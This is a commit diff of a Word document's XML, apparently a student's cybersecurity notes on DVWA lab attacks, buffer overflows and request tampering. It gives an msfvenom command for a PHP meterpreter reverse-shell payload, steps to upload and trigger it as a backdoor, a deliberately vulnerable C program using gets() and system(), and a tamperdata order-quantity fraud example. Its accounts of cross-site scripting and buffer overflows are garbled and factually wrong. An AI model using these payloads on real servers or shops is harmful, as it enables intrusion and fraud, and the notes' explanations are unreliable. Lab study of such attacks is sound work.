<commit_message>
done owasp and buffer overflow
</commit_message>
<xml_diff>
--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -9968,6 +9968,115 @@
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>OWASP [open web application security projects]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like an server and allows us to attack it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more simple .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The OWASP pages can be accesses from the web browser for different attacks. The DVWA(damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross site scripting attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This attack is done by uploading a Trojan to a web site and executing i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t with the help of a script that is given to the web. The script is entered into the message blocks or text fields.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Solution: Validate the uploads and the entries in the text areas before taking in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is done in similar fashion to java and windows payload attacks. Here we will be creating a php file instead of a .exe file and upload it to the we site. This when execute will open the backdoor to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Since there are some issues with the new kali venom tools use old kali payload tool for this experiment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>For creating a payload: msfvenom –p php/meterpreter/reverse_tcp –f raw&gt;filename.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now upload this to the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now we need to run a script on the page to execute this file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Script:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;script&gt; window.location=</w:t>
+      </w:r>
+      <w:hyperlink w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://ipofserver(192.168.1.107 in my case)/dvwa/hackable/uploads/filename.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Executing this we will get a backdoor.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:u w:val="single"/>
@@ -9978,7 +10087,6 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Trojans:</w:t>
       </w:r>
       <w:r>
@@ -10263,7 +10371,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Sniffing</w:t>
       </w:r>
     </w:p>
@@ -10391,6 +10498,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Telnet passwords</w:t>
       </w:r>
     </w:p>
@@ -10555,11 +10663,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">DDOS attack: This is a kind of DOS attack that totally hides the attackers and the attack. In normal DOS attack only one attacker will be there. It is same in the DDOS attack but the attacker pretends to be many people and sends the packets. This causes a difficulty for the </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">server managers to point the attackers but still they can stop the attack by limiting the number of packets from each IP. </w:t>
+        <w:t xml:space="preserve">DDOS attack: This is a kind of DOS attack that totally hides the attackers and the attack. In normal DOS attack only one attacker will be there. It is same in the DDOS attack but the attacker pretends to be many people and sends the packets. This causes a difficulty for the server managers to point the attackers but still they can stop the attack by limiting the number of packets from each IP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10646,6 +10750,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>BOT NET: This is automated virus. This simply reflects itself and attacks all the victims that are vulnerable and opens the backdoor to the attacker.</w:t>
       </w:r>
     </w:p>
@@ -10678,9 +10783,207 @@
       <w:r>
         <w:t>and crazypinger etc.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer Overflow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer is used for temporary storage of data that yet needs to be processed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the Buffer(RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer also stops data overlapping. It add or leaves extra space after each memory space to store extra bits if necessary, this helps in stopping the data overflows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what is it looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
+      </w:r>
+      <w:r>
+        <w:t>it is received from the CPU so instead of checking , it will directly executes as a command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Here is small program in C to understand the buffer overflow attack. This attack can be done with any other languages or scripts also.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Buffer.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#include&lt;stdio.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Void main()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Char * name ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Char *command;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>name = (char *)malloc(10);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>command=(char*)malloc(30);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Address of name is :%d”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“address of command is:%d”,command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Difference between addresses:%d”, command –name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Enter your name :”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>gets(name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“hello! %s\n”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>system(command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>If executed we will be getting the address of name and command. We will also see the difference between both.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into command . so when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tampering of Data: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> There is every possibility that we can tamper with the requests over the data. We can use tools like </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">tamperdata or tampermonkey </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to tamper with the requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use tamperdata while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now this is same as like the above hacks, worked a long time ago but every such sites have patched these vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
@@ -10932,6 +11235,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0D0B1BA6"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="69AC6990"/>
+    <w:lvl w:ilvl="0" w:tplc="40090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0F2B2316"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="670A5272"/>
@@ -11044,7 +11460,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="19BA3C23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EEAC55C"/>
@@ -11130,7 +11546,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B012005"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3F3685C4"/>
@@ -11216,7 +11632,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B845814"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6090096A"/>
@@ -11302,7 +11718,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C540331"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5CDE07BE"/>
@@ -11415,7 +11831,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="205515BD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1D1E71C6"/>
@@ -11504,7 +11920,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20EB0347"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF2483BE"/>
@@ -11617,7 +12033,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28755231"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AEC09966"/>
@@ -11730,7 +12146,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C533112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="52DE695A"/>
@@ -11843,7 +12259,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C80678E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF66D31E"/>
@@ -11956,7 +12372,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CB97ECF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3D763EB8"/>
@@ -12069,7 +12485,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2EC916C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9744997E"/>
@@ -12155,7 +12571,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F756123"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F9A7344"/>
@@ -12241,7 +12657,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35D56A6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="13D67F38"/>
@@ -12327,7 +12743,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BBA210B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9392F422"/>
@@ -12440,7 +12856,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C4C7B79"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4F5C0A08"/>
@@ -12553,7 +12969,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="40413435"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="30186B74"/>
@@ -12666,7 +13082,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42A20738"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5E1240AE"/>
@@ -12779,7 +13195,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43EF75BB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B54C9A6A"/>
@@ -12892,7 +13308,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="466B2C0A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="81CABED2"/>
@@ -13005,7 +13421,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFB7364"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="13FCFC6A"/>
@@ -13118,7 +13534,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5103291A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E564C9B0"/>
@@ -13231,7 +13647,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56746C9B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="93687E9C"/>
@@ -13344,7 +13760,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58D63FD5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB7A028A"/>
@@ -13457,7 +13873,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5AEA7BFF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7DFE11AE"/>
@@ -13570,7 +13986,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E4550A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C765CC8"/>
@@ -13683,7 +14099,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DA176D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE0E9F7C"/>
@@ -13796,7 +14212,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="782F7235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65A04688"/>
@@ -13909,7 +14325,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D795EE6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3F82F6E"/>
@@ -14023,7 +14439,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14053,6 +14469,36 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="31"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="30"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -14082,38 +14528,8 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="29"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14143,7 +14559,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -14173,7 +14589,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="6">
-    <w:abstractNumId w:val="12"/>
